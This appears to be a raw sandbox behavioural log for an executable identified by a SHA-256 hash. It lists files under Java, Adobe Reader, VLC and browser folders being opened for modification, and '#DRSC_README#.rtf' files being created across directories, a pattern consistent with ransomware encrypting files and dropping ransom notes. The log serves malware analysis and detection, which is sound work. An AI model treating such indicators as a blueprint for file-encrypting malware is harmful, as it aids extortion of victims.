710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\pl.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\ReadOutLoud.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management-agent.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tehran 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Sitka 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\release 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-2 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiler_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayenne 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wake 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Monterrey 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.greychartplugin_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vilnius 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Managua 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Oral 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boa_Vista 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\PYCC.pf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\lib\security\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Edmonton 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tallinn 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4ADT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\reader\filename.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\bl.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro_3.4.200.v20130326-1254.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\RegisterRedo.xls 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\about.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\security\cacerts 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\en_GB\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCalls.c 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-explorer.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Zurich 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\2d.x3d 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\La_Paz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-charts.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Vincennes 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Data1.cab 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CORPCHAR.TXT 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-text.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\epl-v10.html 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Helsinki 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.properties 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Faroe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\mc.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kolkata 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mauritius 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Yakutsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.zh_CN_5.5.0.165303.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\vlc.mo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javadoc.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\bin\rmid.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_basestyle.css 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Mozilla Firefox\default-browser-agent.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ca.pak 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Nicosia 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.commons.codec_1.6.0.v201305230611.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Novosibirsk 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yerevan 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javac.exe 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cayman 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Cairo 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help_3.6.0.v20130326-1254.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Brisbane 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-uisupport_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Nairobi 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_ja_4.4.0.v20140623020002.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jre7\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created 